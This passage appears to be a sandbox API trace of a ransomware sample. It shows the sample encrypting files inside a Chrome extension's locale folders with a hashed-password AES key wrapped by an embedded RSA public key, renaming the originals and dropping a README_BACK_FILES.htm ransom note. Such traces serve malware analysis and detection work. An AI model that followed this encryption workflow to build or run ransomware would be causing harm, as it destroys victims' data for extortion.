lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.896] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.896] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.896] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.896] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.896] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.896] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.896] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.896] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.896] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.896] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.897] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.897] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.897] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.897] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.897] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.897] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.897] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.897] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.897] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x4c, lpOverlapped=0x0) returned 1 [0262.897] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x4c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x50) returned 1 [0262.897] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x50, lpOverlapped=0x0) returned 1 [0262.897] CloseHandle (hObject=0x5d5c) returned 1 [0262.897] CloseHandle (hObject=0x5d60) returned 1 [0262.897] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json"), bFailIfExists=0) returned 1 [0262.900] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json", dwFileAttributes=0x0) returned 1 [0262.900] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.gsg")) returned 1 [0262.901] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.fuck")) returned 1 [0262.902] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.902] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0262.902] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.902] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.902] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.902] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\readme_back_files.htm")) returned 0xffffffff [0262.902] AreFileApisANSI () returned 1 [0262.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.903] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.903] GetFileType (hFile=0x5d64) returned 0x1 [0262.904] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.904] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.905] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.905] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.905] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.905] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.905] GetLastError () returned 0x0 [0262.905] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json")) returned 0x20 [0262.905] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json", dwFileAttributes=0x80) returned 1 [0262.905] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.906] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.907] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.907] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.909] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.909] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0262.909] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.909] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0262.909] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.909] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.909] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e73f88) returned 1 [0262.910] CryptImportPublicKeyInfo (in: hCryptProv=0x2e73f88, dwCertEncodingType=0x1, pInfo=0x2ead760*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2ead790*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2ead798*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e740) returned 1 [0262.910] CryptEncrypt (in: hKey=0x2e7e740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.910] CryptEncrypt (in: hKey=0x2e7e740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e74450*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e74450*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.910] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e74450*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e74450*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.911] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.915] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.915] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.920] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.921] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.921] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.921] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.921] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.921] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.921] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.921] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.921] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.921] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.921] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.921] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.921] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.921] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.921] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.921] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.922] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.922] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.922] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.922] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.922] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.922] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.922] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.922] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.922] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.922] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.922] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.922] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.922] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.922] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.922] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.922] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.922] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.922] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.923] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.923] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, 